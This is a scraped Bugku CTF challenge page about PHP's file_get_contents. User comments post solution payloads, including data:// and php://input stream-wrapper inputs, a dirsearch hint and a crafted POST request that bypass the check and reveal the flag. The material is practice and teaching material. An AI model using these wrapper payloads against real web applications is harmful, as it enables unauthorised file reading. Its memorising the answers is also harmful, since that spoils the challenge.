file_get_contentsWEB 未解决

分数: 30 金币: 3
题目作者: harry
一  血: npfs
一血奖励: 2金币
解  决: 4797
提  示:
描  述:
file_get_contents????
评论
Hrkh 4月前

使用dirsearch扫描,找到一个flag.txt打开后里边内容为bugku,传参?ac=bugku&fn=flag.txt得到FLAG

回复 2

zxcvbnmzhang 5月前

?ac=hello&fn=data://text/plain,hello

回复 3

ibuprofen 5月前

?ac=bugku&fn=flag.txt

回复 0

一个姓⎝李⎠的师傅~ 5月前

小白解题思路,包含所有知识点:https://www.yuque.com/u21437924/ap9vtm/gqkc3dcfmfpe5p85?singleDoc#X0GpS

回复 4

六分之杰 6月前

POST /?ac=bugku&fn=flag.txt HOST: Content-Type: application/x-www-form-urlencoded Content-Length: 18 flag_content=bugku

回复 0

laoaos 6月前

flag{********}

回复 0

solomom 6月前

用dirsearch扫描发现恰好有flag.txt文件,里面写了bugku,给我们的fn提供的可读取的文件,所以ac直接传bugku。?fn=./flag.txt&ac=bugku

回复 2

ubudj 6月前

绕过file_get_contents,有两种方法:?ac=1&fn=data://text/wenjian,1 ?ac=1&fn=php://input,再用post输入1

回复 2

wywsssf 6月前

?fn=./flag.txt&ac=bugku

回复 1

2686213396 7月前

data伪协议

回复 0

WriteUp

image
harry

3 金币

评分(7)

解题动态

CD123456 攻破了该题 13小时前
18171382569 攻破了该题 15小时前
gclome 攻破了该题 4天前
Jazz888 攻破了该题 4天前
麻辣鸽子头 攻破了该题 4天前
雨季小朋友 攻破了该题 5天前
十里故清云 攻破了该题 5天前
2523822945 攻破了该题 6天前
qq1002517 攻破了该题 6天前
潭影空人心 攻破了该题 6天前
Mori. 攻破了该题 8天前
Arno_Zoffy 攻破了该题 10天前
Jasmine_Iris 攻破了该题 10天前
喜樂乐 攻破了该题 10天前
simple9527 攻破了该题 10天前
hdcc1 攻破了该题 10天前
bak3l1 攻破了该题 10天前
kiritoldws 攻破了该题 11天前
YanC1e 攻破了该题 11天前
H8Y8H 攻破了该题 11天前
问题反馈